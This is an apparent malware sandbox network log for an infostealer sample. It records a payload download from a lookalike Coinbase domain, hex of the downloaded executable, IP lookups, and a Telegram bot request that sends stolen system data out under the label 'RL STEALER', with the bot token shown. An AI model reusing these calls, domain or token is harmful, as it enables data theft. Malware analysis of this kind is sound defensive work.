                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 9367e727cb7140928822be84efec2857
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:30 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.449776162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:31 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:32 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:31 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: fc26f50bdac0430aa2363f38f94c5dfb
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:32 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.449780162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:32 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:33 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:32 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: e980e04bf9cd4687969381d14d820f3b
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:33 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.449822188.114.97.34437208C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC109OUTGET /event.php HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla 5/0
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:07 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Disposition: inline; filename="zbi.exe"
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hi51Bp%2F%2F6p3%2BRDh4yZux1HjzSlEiJCuVErtLew%2By27gdFPXlNvKyonZdMCYM62HI9JDkyj8BXk5Q2G8%2FwmIObuQUv4JO24EWodEiGcGd7RH%2Fk96KWcEyjaTgNWqlykrJ3Q9JvFg7KdH6uPk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fdf78760fab-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC702INData Raw: 31 65 63 32 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9e c7 3a c2 da a6 54 91 da a6 54 91 da a6 54 91 da a6 55 91 16 a6 54 91 26 d1 ed 91 cf a6 54 91 26 d1 e8 91 d8 a6 54 91 44 06 93 91 db a6 54 91 1e 63 9b 91 91 a6 54 91 1e 63 9a 91 0b a6 54 91 1e 63 99 91 d1 a6 54 91 fd 60 87 91 d7 a6 54 91 fd 60 9d 91 db a6 54 91 da a6 c3 91 db a6 54 91 fd 60 98 91 db a6 54 91 52 69 63 68 da a6 54 91 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: 1ec2MZ@!L!This program cannot be run in DOS mode.$:TTTUT&T&TDTcTcTcT`T`TT`TRichT
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1b 00 00 00 d0 03 00 00 1c 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: @@.reloc@B
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: c7 0f 10 43 18 48 8b 5c 24 30 f3 0f 7f 47 18 48 83 c4 20 5f c3 cc cc 40 53 48 81 ec d0 07 00 00 48 8b 05 d8 3f 03 00 48 33 c4 48 89 84 24 c0 07 00 00 48 8b d9 84 d2 74 46 48 8d 4c 24 20 33 d2 41 b8 cc 02 00 00 e8 d4 45 01 00 48 8b 4b 08 48 8d 54 24 20 c7 44 24 20 02 00 10 00 ff 15 2d 4d 02 00 85 c0 75 10 48 8d 0d c2 a6 02 00 e8 21 af 00 00 33 c0 eb 48 8b 84 24 c4 00 00 00 eb 3f 48 8d 8c 24 f0 02 00 00 33 d2 41 b8 d0 04 00 00 e8 8b 45 01 00 48 8b 4b 08 48 8d 94 24 f0 02 00 00 c7 84 24 20 03 00 00 02 00 10 00 ff 15 be 4c 02 00 f7 d8 48 1b c0 48 23 84 24 78 03 00 00 48 8b 8c 24 c0 07 00 00 48 33 cc e8 41 a6 00 00 48 81 c4 d0 07 00 00 5b c3 40 55 53 56 57 48 8d ac 24 08 f9 ff ff 48 81 ec f8 07 00 00 48 8b 05 0d 3f 03 00 48 33 c4 48 89 85 e0 06 00 00 41 8a f9
                                                                                                                                                                                                                                Data Ascii: CH\$0GH _@SHH?H3H$HtFHL$ 3AEHKHT$ D$ -MuH!3H$?H$3AEHKH$$ LHH#$xH$H3AH[@USVWH$HH?H3HA
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: c3 cc 48 83 ec 28 48 8b 11 48 8b 02 48 63 48 04 48 8b 4c 11 48 48 85 c9 74 06 48 8b 01 ff 50 10 48 83 c4 28 c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b 7a 10 49 8b e8 48 8b f2 48 8b d9 49 3b f8 0f 82 d2 00 00 00 49 2b f8 4c 3b cf 49 0f 42 f9 48 3b ca 75 2c 4a 8d 04 07 48 39 41 10 0f 82 c2 00 00 00 48 83 79 18 10 48 89 41 10 72 03 48 8b 09 c6 04 08 00 33 d2 48 8b cb e8 c1 00 00 00 eb 7f 48 83 ff fe 0f 87 a7 00 00 00 48 39 79 18 73 0e 4c 8b 41 10 48 8b d7 e8 3f 01 00 00 eb 1b 48 85 ff 75 1b 48 21 79 10 48 83 79 18 10 72 05 48 8b 01 eb 03 48 8b c1 c6 00 00 48 85 ff 74 41 48 83 7e 18 10 72 03 48 8b 36 48 83 7b 18 10 72 05 48 8b 0b eb 03 48 8b cb 48 85 ff 74 0c 48 8d 14 2e 4c 8b c7 e8 e3 a2 00 00 48 83 7b 18 10 48 89 7b 10 72 05 48
                                                                                                                                                                                                                                Data Ascii: H(HHHcHHLHHtHPH(H\$Hl$Ht$WH HzIHHI;I+L;IBH;u,JH9AHyHArH3HHH9ysLAH?HuH!yHyrHHHtAH~rH6H{rHHHtH.LH{H{rH
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: d0 fe ff ff ff 49 89 5b 18 49 89 73 20 48 8b 05 39 35 03 00 48 33 c4 48 89 44 24 40 48 8b da 48 8b f1 49 89 4b d8 49 89 53 e0 83 64 24 20 00 48 c7 41 18 0f 00 00 00 48 83 61 10 00 c6 01 00 45 33 c0 48 8d 15 ec 9c 02 00 e8 f7 f8 ff ff c7 44 24 20 01 00 00 00 33 ff 48 39 7b 10 76 6c 48 8b 43 18 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 41 7c 2c 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 5a 7f 18 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 41 80 c0 20 eb 12 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 ba 01 00 00 00 48 8b ce e8 8c 06 00 00 48 ff c7 48 3b 7b 10 72 94 48 83 7b 18 10 72 08 48 8b 0b e8 e8 a4 00 00 48 c7 43 18 0f 00 00 00 48 83 63 10 00 c6 03 00 48 8b c6 48 8b 4c 24 40 48 33 cc e8 64 9b 00 00 48 8b 5c 24 70 48
                                                                                                                                                                                                                                Data Ascii: I[Is H95H3HD$@HHIKISd$ HAHaE3HD$ 3H9{vlHCHrHH<9A|,HrHH<9ZHrHHD8A HrHHD8HHH;{rH{rHHCHcHHL$@H3dH\$pH
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: c6 07 00 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 40 53 48 83 ec 20 48 83 79 18 08 48 8b d9 72 08 48 8b 09 e8 3c a0 00 00 33 c0 48 c7 43 18 07 00 00 00 48 89 43 10 66 89 03 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 13 e8 0e a0 00 00 48 83 23 00 48 83 63 08 00 48 83 63 10 00 48 83 c4 20 5b c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b d9 48 8b 49 08 48 8b fa 48 3b d1 0f 83 b4 00 00 00 48 39 13 0f 87 ab 00 00 00 48 2b 3b 48 b8 1b ca 6b 28 af a1 bc 06 48 f7 ef 48 8b fa 48 c1 ff 03 48 8b c7 48 c1 e8 3f 48 03 f8 48 3b 4b 10 75 08 48 8b cb e8 82 02 00 00 48 8b 4b 08 48 69 ff 30 01 00 00 be 30 01 00 00 48 03 3b 48 85 c9 0f 84 f9 00 00 00 48 8b c7 48 0b c1 83 e0 0f 0f 85 df 00 00 00 8d 50 02 8d 42 7e 0f 28 07 0f
                                                                                                                                                                                                                                Data Ascii: HH\$0H _@SH HyHrH<3HCHCfH [@SH HHHtH#HcHcH [H\$Ht$WH HHIHH;H9H+;Hk(HHHHH?HH;KuHHKHi00H;HHHPB~(
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC335INData Raw: f0 0f 29 49 f0 48 ff c8 75 af 0f 28 02 0f 29 01 0f 28 4a 10 0f 29 49 10 0f 28 42 20 0f 29 41 20 eb 08 4c 8b c5 e8 a1 93 00 00 48 03 fd 48 03 dd 48 3b fe 0f 85 61 ff ff ff 48 8b 6c 24 38 48 8b 74 24 40 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 89 5c 24 08 57 48 81 ec 70 06 00 00 48 8b 05 34 2a 03 00 48 33 c4 48 89 84 24 60 06 00 00 48 8d 94 24 50 04 00 00 41 b8 04 01 00 00 33 c9 ff 15 13 38 02 00 33 ff 85 c0 75 07 32 c0 e9 a2 00 00 00 45 33 c9 48 8d 84 24 40 02 00 00 45 33 c0 41 8d 51 1c 33 c9 48 89 44 24 20 ff 15 d7 39 02 00 85 c0 78 d6 45 33 c9 48 8d 44 24 30 45 33 c0 41 8d 51 1a 33 c9 48 89 44 24 20 ff 15 b7 39 02 00 85 c0 78 b6 48 83 cb ff 48 8d 84 24 40 02 00 00 4c 8b c3 49 ff c0 66 42 39 3c 40 75 f6 48 8d 94 24 40 02 00 00 48 8d 8c 24 50 04
                                                                                                                                                                                                                                Data Ascii: )IHu()(J)I(B )A LHHH;aHl$8Ht$@HH\$0H _H\$WHpH4*H3H$`H$PA383u2E3H$@E3AQ3HD$ 9xE3HD$0E3AQ3HD$ 9xHH$@LIfB9<@uH$@H$P
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: 37 32 31 30 0d 0a 00 00 48 81 c4 70 06 00 00 5f c3 cc cc cc 40 53 56 57 48 83 ec 30 49 8b 38 48 83 c8 ff 33 f6 48 ff c0 66 39 34 41 75 f7 8d 04 45 02 00 00 00 bb 01 00 00 00 45 33 c0 89 44 24 28 48 89 4c 24 20 48 8b cf 44 8b cb ff 15 2a 35 02 00 85 c0 74 03 40 8a de 48 8b cf ff 15 12 35 02 00 8a c3 48 83 c4 30 5f 5e 5b c3 48 89 5c 24 18 48 89 74 24 20 57 48 81 ec 50 04 00 00 48 8b 05 cf 28 03 00 48 33 c4 48 89 84 24 40 04 00 00 48 8b fa 48 8d 54 24 20 48 8b d9 49 2b d0 33 f6 41 0f b7 00 66 42 89 04 02 4d 8d 40 02 66 85 c0 75 ee 48 8d 4c 24 20 48 83 e9 02 48 8d 49 02 66 39 31 75 f7 48 8b 05 39 91 02 00 33 d2 48 89 01 48 8b 05 35 91 02 00 48 89 41 08 8b 05 33 91 02 00 89 41 10 0f b7 05 2d 91 02 00 66 89 41 14 48 8d 4c 24 20 ff 15 4a 36 02 00 48 8b ce 0f b7
                                                                                                                                                                                                                                Data Ascii: 7210Hp_@SVWH0I8H3Hf94AuEE3D$(HL$ HD*5t@H5H0_^[H\$Ht$ WHPH(H3H$@HHT$ HI+3AfBM@fuHL$ HHIf91uH93HH5HA3A-fAHL$ J6H
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: 8b 0e 48 8b d3 ff cd e8 13 ff ff ff 48 8d 15 20 8d 02 00 8b c8 48 03 cb e8 b6 97 00 00 48 85 c0 75 29 48 83 c6 04 48 83 c7 02 85 ed 75 d2 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 41 8b 4e 1c 48 8b d3 e8 c8 fe ff ff 44 0f b7 07 48 8b d3 8b c8 48 03 cb 42 8b 0c 81 e8 b3 fe ff ff eb c2 cc 40 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 60 48 8b 05 75 23 03 00 48 33 c4 48 89 44 24 50 45 8b f0 48 8b f2 48 8b f9 33 db 89 5c 24 48 89 5c 24 4c 48 85 c9 0f 84 b9 00 00 00 48 85 d2 0f 84 b0 00 00 00 45 85 c0 0f 84 a7 00 00 00 48 8b ca e8 c7 fe ff ff 44 8b e0 85 c0 0f 84 94 00 00 00 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 45 8b c6 33 d2 48 8b cf ff 15 d8 30 02 00 4c 8b f8 48 85 c0 74 70 44 89 76 02 48 89 5c 24 20 45 8b ce
                                                                                                                                                                                                                                Data Ascii: HH HHu)HHu3H\$0Hl$8Ht$@H|$HH A^ANHDHHB@SVWATAUAVAWH`Hu#H3HD$PEHH3\$H\$LHHEHDD$ @A0E3H0LHtpDvH\$ E
                                                                                                                                                                                                                                2024-07-06 11:28:07 UTC1369INData Raw: 41 5e 5f 5e 5d c3 40 53 48 83 ec 50 48 8b 05 8f 1e 03 00 48 33 c4 48 89 44 24 48 48 83 64 24 40 00 48 89 4c 24 30 48 8b d9 48 8d 4c 24 40 45 33 c9 45 33 c0 ba 1f 00 0f 00 c7 44 24 28 00 00 00 01 c7 44 24 20 02 00 00 00 ff 15 fb 2e 02 00 85 c0 74 06 48 83 c8 ff eb 39 48 8d 0d da 88 02 00 48 8b d1 e8 fa d8 00 00 85 c0 75 08 48 8b cb e8 c2 fb ff ff 48 8b cb ff 15 bd 2e 02 00 48 8b 54 24 40 48 83 c8 ff 48 8d 4a ff 48 83 f9 fd 48 0f 46 c2 48 8b 4c 24 48 48 33 cc e8 13 85 00 00 48 83 c4 50 5b c3 cc 40 55 53 56 57 41 54 41 56 41 57 48 8d ac 24 e0 fd ff ff 48 81 ec 20 03 00 00 48 8b 05 db 1d 03 00 48 33 c4 48 89 85 10 02 00 00 4c 8b f9 48 8b da 48 8d 4d 02 45 33 e4 33 d2 41 b8 06 02 00 00 4d 8b f1 66 44 89 65 00 e8 cf 23 01 00 48 8d 4d 00 48 83 c8 ff 48 ff c0 66
                                                                                                                                                                                                                                Data Ascii: A^_^]@SHPHH3HD$HHd$@HL$0HHL$@E3E3D$(D$ .tH9HHuHH.HT$@HHJHHFHL$HH3HP[@USVWATAVAWH$H HH3HLHHME33AMfDe#HMHHf


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.449826104.26.13.2054437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:09 UTC63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:09 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:09 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3fed6a49423a-EWR
                                                                                                                                                                                                                                2024-07-06 11:28:09 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.449832104.26.13.2054437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:12 UTC63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:12 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:12 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ffbbc7c0f8c-EWR
                                                                                                                                                                                                                                2024-07-06 11:28:12 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.449838104.26.13.2054437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:15 UTC63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:15 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:15 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef401198940cc9-EWR
                                                                                                                                                                                                                                2024-07-06 11:28:15 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                21192.168.2.449841149.154.167.2204437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:16 UTC1520OUTPOST /bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-4206528371&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:27%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%9 [TRUNCATED]
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dc9ea4f458eb80
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Length: 674280
                                                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC25INHTTP/1.1 100 Continue
